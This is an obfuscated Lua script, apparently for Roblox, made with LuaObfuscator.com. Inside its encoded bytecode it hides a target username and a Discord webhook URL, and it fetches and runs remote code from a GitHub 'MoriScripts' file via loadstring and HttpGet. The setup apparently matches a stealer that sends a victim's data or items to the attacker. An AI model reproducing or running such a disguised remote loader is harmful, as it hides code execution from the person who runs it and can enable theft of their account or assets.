--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (1==v18) then function v21(v31,v32,v33)if v33 then local v70=0 -0 ;local v71;while true do if (v70==(0 + 0)) then v71=(v31/((1 + 1)^(v32-(2 -1))))%((3 -1)^(((v33-((958 -(892 + 65)) + 0)) -(v32-((4 -2) -1))) + (1066 -(68 + 997)))) ;return v71-(v71%((1146 -526) -(555 + 64))) ;end end else local v72=(933 -(857 + 74))^(v32-(118 -(32 + 85))) ;return (((v31%(v72 + v72))>=v72) and (569 -(367 + (368 -167)))) or (0 + 0) ;end end v22=nil;function v22()local v34=350 -(87 + 263) ;local v35;while true do if (v34==(181 -(67 + 113))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v19,v19);v19=v19 + (2 -(3 -2)) ;v34=1 + 0 ;end end end v23=nil;v18=2;end if (2==v18) then function v23()local v36=952 -(802 + 150) ;local v37;local v38;while true do if (v36==1) then return (v38 * (689 -433)) + v37 ;end if (v36==0) then v37,v38=v1(v16,v19,v19 + (3 -1) );v19=v19 + (5 -3) + 0 + 0 ;v36=998 -(915 + (107 -25)) ;end end end v24=nil;function v24()local v39,v40,v41,v42=v1(v16,v19,v19 + (1190 -(1069 + 118)) );v19=v19 + (8 -(6 -2)) ;return (v42 * 16777216) + (v41 * (143357 -77821)) + (v40 * (45 + 211)) + v39 ;end v25=nil;v18=3;end if (v18==3) then function v25()local v43=v24();local v44=v24();local v45=1 + 0 ;local v46=(v21(v44,4 -3 ,12 + (1921 -(1789 + 124)) ) * (((773 -(745 + 21)) -5)^((39 + 74) -81))) + v43 ;local v47=v21(v44,812 -(368 + 423) ,97 -66 );local v48=((v21(v44,50 -(10 + 8) )==(1 + 0)) and  -((7 -4) -2)) or (443 -(416 + 26)) ;if (v47==(0 -0)) then if (v46==(0 -0)) then return v48 * (0 + (0 -0)) ;else v47=1424 -(630 + 793) ;v45=0 -0 ;end elseif (v47==(2485 -(145 + 293))) then return ((v46==(430 -(44 + 386))) and (v48 * ((1 + 0)/(1486 -(9 + 989 + 488))))) or (v48 * NaN) ;end return v8(v48,v47-(325 + 698) ) * (v45 + (v46/((2 + 0)^((647 + 177) -(201 + 571))))) ;end v26=nil;function v26(v49)local v50=0;local v51;local v52;while true do if (v50==(1055 -(25 + 62 + 968))) then v51=nil;if  not v49 then local v95=0 -0 ;while true do if (v95==(0 + 0)) then v49=v24();if (v49==0) then return "";end break;end end end v50=(4 -2) -1 ;end if (v50==((1429 -(9 + 5)) -((823 -(85 + 291)) + 966))) then v52={};for v79=2 -1 , #v51 do v52[v79]=v2(v1(v3(v51,v79,v79)));end v50=1268 -(243 + 1022) ;end if (v50==(1820 -(1703 + 114))) then return v6(v52);end if (v50==(702 -(376 + 325))) then v51=v3(v16,v19,(v19 + v49) -(1 -0) );v19=v19 + v49 ;v50=5 -(11 -8) ;end end end v27=v24;v18=4;end if (v18==5) then v30=nil;function v30(v53,v54,v55)local v56=0;local v57;local v58;local v59;while true do if (v56==1) then v59=v53[3];return function(...)local v81=v57;local v82=v58;local v83=v59;local v84=v28;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v96=0,v89 do if (v96>=v83) then v87[v96-v83 ]=v88[v96 + 1 ];else v91[v96]=v88[v96 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v97=0;while true do if (v97==1) then if (v94<=5) then if (v94<=2) then if (v94<=0) then local v116=0;local v117;local v118;local v119;local v120;while true do if (v116==0) then v117=v93[2];v118,v119=v84(v91[v117](v13(v91,v117 + 1 ,v93[3])));v116=1;end if (v116==2) then for v174=v117,v86 do v120=v120 + 1 ;v91[v174]=v118[v120];end break;end if (v116==1) then v86=(v119 + v117) -1 ;v120=0;v116=2;end end elseif (v94==1) then local v124=v93[2];v91[v124]=v91[v124](v13(v91,v124 + 1 ,v86));else v91[v93[2]]();end elseif (v94<=3) then local v121=0;while true do if (3==v121) then v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v121=4;end if (v121==4) then v85=v93[3];break;end if (v121==2) then v55[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v121=3;end if (v121==0) then v55[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v121=1;end if (v121==1) then v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v121=2;end end elseif (v94>4) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else v55[v93[3]]=v91[v93[2]];end elseif (v94<=8) then if (v94<=6) then v91[v93[2]]=v93[3]~=0 ;elseif (v94==7) then local v128=v93[2];local v129=v91[v93[3]];v91[v128 + 1 ]=v129;v91[v128]=v129[v93[4]];else do return;end end elseif (v94<=10) then if (v94==9) then v91[v93[2]]=v93[3];else local v135;local v136,v137;local v138;local v139;v55[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v55[v93[3]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v55[v93[3]];v85=v85 + 1 ;v93=v81[v85];v139=v93[2];v138=v91[v93[3]];v91[v139 + 1 ]=v138;v91[v139]=v138[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3]~=0 ;v85=v85 + 1 ;v93=v81[v85];v139=v93[2];v136,v137=v84(v91[v139](v13(v91,v139 + 1 ,v93[3])));v86=(v137 + v139) -1 ;v135=0;for v171=v139,v86 do v135=v135 + 1 ;v91[v171]=v136[v135];end v85=v85 + 1 ;v93=v81[v85];v139=v93[2];v91[v139]=v91[v139](v13(v91,v139 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];v85=v93[3];end elseif (v94==11) then v85=v93[3];else v91[v93[2]]=v55[v93[3]];end v85=v85 + 1 ;break;end if (v97==0) then v93=v81[v85];v94=v93[1];v97=1;end end end end;end if (v56==0) then v57=v53[1];v58=v53[2];v56=1;end end end return v30(v29(),{},v17)(...);end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v73=0;while true do if (v73==0) then v20=v0(v3(v60,1,1));return "";end end else local v74=0;local v75;while true do if (v74==0) then v75=v2(v0(v60,16));if v20 then local v104=v5(v75,v20);v20=nil;return v104;else return v75;end break;end end end end);v21=nil;v18=1;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v61=0 + 0 ;local v62;local v63;local v64;local v65;local v66;local v67;local v68;local v69;while true do if (v61==(1027 -(706 + 318))) then v68=nil;v69=nil;v61=1255 -(721 + 530) ;end if (v61==(1 -0)) then v64=nil;v65=nil;v61=1273 -(945 + 326) ;end if ((4 -2)==v61) then v66=nil;v67=nil;v61=3 + 0 ;end if (4~=v61) then else while true do if (v62~=3) then else v69=nil;while true do if (v63==(339 -(144 + 192))) then local v107=700 -(271 + 429) ;while true do if (v107==(0 + 0)) then for v114=1 + 0 ,v24() do v65[v114-(1501 -(1408 + 92)) ]=v29();end return v67;end end end if (v63~=(1 + 0)) then else local v108=1086 -(461 + 625) ;local v109;while true do if (v108~=(1288 -(993 + 295))) then else v109=0 + 0 ;while true do if (v109==0) then v67={v64,v65,nil,v66};v68=v24();v109=1 + 0 ;end if (v109~=(1 + 0)) then else v69={};v63=1 + 1 ;break;end end break;end end end if (v63==(2 + 0)) then local v110=0;local v111;while true do if (v110==0) then v111=0 -0 ;while true do if (1==v111) then for v152=1,v24() do local v153=529 -(406 + 123) ;local v154;local v155;local v156;while true do if ((1769 -(1749 + 20))~=v153) then else v154=0 + 0 ;v155=nil;v153=1323 -(1249 + 73) ;end if (v153~=1) then else v156=nil;while true do if (v154==(1 + 0)) then while true do if (v155==0) then v156=v22();if (v21(v156,1,1)==(1145 -(466 + 679))) then local v191=1661 -(1477 + 184) ;local v192;local v193;local v194;while true do if (v191==(6 -3)) then if (v21(v193,8 -5 ,1903 -(106 + 1794) )==1) then v194[2 + 2 ]=v69[v194[4 + 0 ]];end v64[v152]=v194;break;end if ((1 + 0)~=v191) then else local v196=0;while true do if (v196~=1) then else v191=2;break;end if (v196~=(0 -0)) then else local v203=0 -0 ;while true do if ((115 -(4 + 110))==v203) then v196=305 -(244 + 60) ;break;end if ((584 -(57 + 527))~=v203) then else v194={v23(),v23(),nil,nil};if (v192==(1125 -(936 + 189))) then local v206=103 -(17 + 86) ;local v207;while true do if (v206~=(0 + 0)) then else v207=0;while true do if (v207==(0 -0)) then v194[8 -5 ]=v23();v194[170 -(122 + 44) ]=v23();break;end end break;end end elseif (v192==(1 -0)) then v194[9 -6 ]=v24();elseif (v192==(2 + 0)) then v194[1 + 2 ]=v24() -((3 -1)^(10 + 6)) ;elseif (v192~=(68 -(30 + 35))) then else local v216=0;local v217;local v218;while true do if (1~=v216) then else while true do if (0~=v217) then else v218=0 + 0 ;while true do if ((1257 -(1043 + 214))~=v218) then else v194[3]=v24() -((7 -5)^16) ;v194[271 -(176 + 91) ]=v23();break;end end break;end end break;end if (v216~=(1212 -(323 + 889))) then else v217=0 -0 ;v218=nil;v216=581 -(361 + 219) ;end end end v203=1;end end end end end if (v191==0) then local v197=320 -(53 + 267) ;while true do if (1~=v197) then else v191=1 + 0 ;break;end if (v197==(413 -(15 + 398))) then local v204=982 -(18 + 964) ;while true do if (v204~=1) then else v197=3 -2 ;break;end if (v204==0) then v192=v21(v156,2,3);v193=v21(v156,3 + 1 ,4 + 2 );v204=1;end end end end end if (v191~=(852 -(20 + 830))) then else local v198=0;local v199;while true do if (v198~=(1018 -(697 + 321))) then else v199=0 + 0 ;while true do if (v199==(126 -(116 + 10))) then local v205=0;while true do if (v205==(0 + 0)) then if (v21(v193,1,739 -(542 + 196) )~=(1 -0)) then else v194[4 -2 ]=v69[v194[2]];end if (v21(v193,2,2)~=1) then else v194[3]=v69[v194[3]];end v205=1 + 0 ;end if (v205~=(1 -0)) then else v199=1;break;end end end if (v199==(1 + 0)) then v191=2 + 1 ;break;end end break;end end end end end break;end end break;end if (v154~=(0 + 0)) then else local v184=611 -(602 + 9) ;while true do if (v184~=(0 -0)) then else local v187=0 -0 ;while true do if ((1551 -(1126 + 425))~=v187) then else v155=405 -(118 + 287) ;v156=nil;v187=3 -2 ;end if (v187~=(1 + 0)) then else v184=1122 -(118 + 1003) ;break;end end end if (v184==(2 -1)) then v154=1;break;end end end end break;end end end v63=380 -(142 + 235) ;break;end if (v111==(0 -0)) then local v123=0 + 0 ;while true do if ((978 -(553 + 424))==v123) then v111=1 -0 ;break;end if ((0 -0)~=v123) then else for v179=1 + 0 ,v68 do local v180=0 + 0 ;local v181;local v182;local v183;while true do if (v180~=(0 + 0)) then else local v185=0 + 0 ;local v186;while true do if (v185~=(0 + 0)) then else v186=0 -0 ;while true do if (v186~=(0 -0)) then else v181=0;v182=nil;v186=1;end if (v186==(2 -1)) then v180=2 -1 ;break;end end break;end end end if (v180~=(215 -(22 + 192))) then else v183=nil;while true do if (v181~=1) then else if (v182==(1 + 0)) then v183=v22()~=(1463 -(1404 + 59)) ;elseif (v182==(5 -3)) then v183=v25();elseif (v182~=(3 -0)) then else v183=v26();end v69[v179]=v183;break;end if (v181~=(0 -0)) then else local v189=562 -(334 + 228) ;local v190;while true do if (v189==(0 -0)) then v190=0;while true do if (v190==(2 -1)) then v181=1;break;end if (v190~=(0 -0)) then else local v200=0 + 0 ;while true do if (v200~=(237 -(141 + 95))) then else v190=1 + 0 ;break;end if (0==v200) then v182=v22();v183=nil;v200=2 -1 ;end end end end break;end end end end break;end end end v67[6 -3 ]=v22();v123=754 -(239 + 514) ;end end end end break;end end end if (v63==(0 -0)) then local v112=0 + 0 ;local v113;while true do if (v112~=(0 + 0)) then else v113=0 + 0 ;while true do if (0~=v113) then else v64={};v65={};v113=1 -0 ;end if (v113~=(1 + 0)) then else v66={};v63=1330 -(797 + 532) ;break;end end break;end end end end break;end if (v62==2) then local v98=0;while true do if (v98==(0 + 0)) then v67=nil;v68=nil;v98=1 -0 ;end if (v98==(1 + 0)) then v62=3;break;end end end if (v62~=(1 + 0)) then else v65=nil;v66=nil;v62=2 + 0 ;end if (v62~=(0 -0)) then else local v99=0;while true do if (v99==1) then v62=1203 -(373 + 829) ;break;end if (v99==0) then v63=731 -(476 + 255) ;v64=nil;v99=1;end end end end break;end if (v61~=(849 -(254 + 595))) then else v62=126 -(55 + 71) ;v63=nil;v61=1;end end end v18=5;end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030C3O004C7563616374757333373336030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31353330313833312O3330383338393435372F692D722O4139625836555053364D32315467774866552O47507A394935634F336B7154776D786C6A787934393368794C5951572D514B734C78617A416D5A7941394A6F7900173O0012093O00013O0026053O000E0001000200040B3O000E0001001209000100043O00120A000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026053O00010001000100040B3O00010001001209000100043O001203000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00083O00017O00",v9(),...);
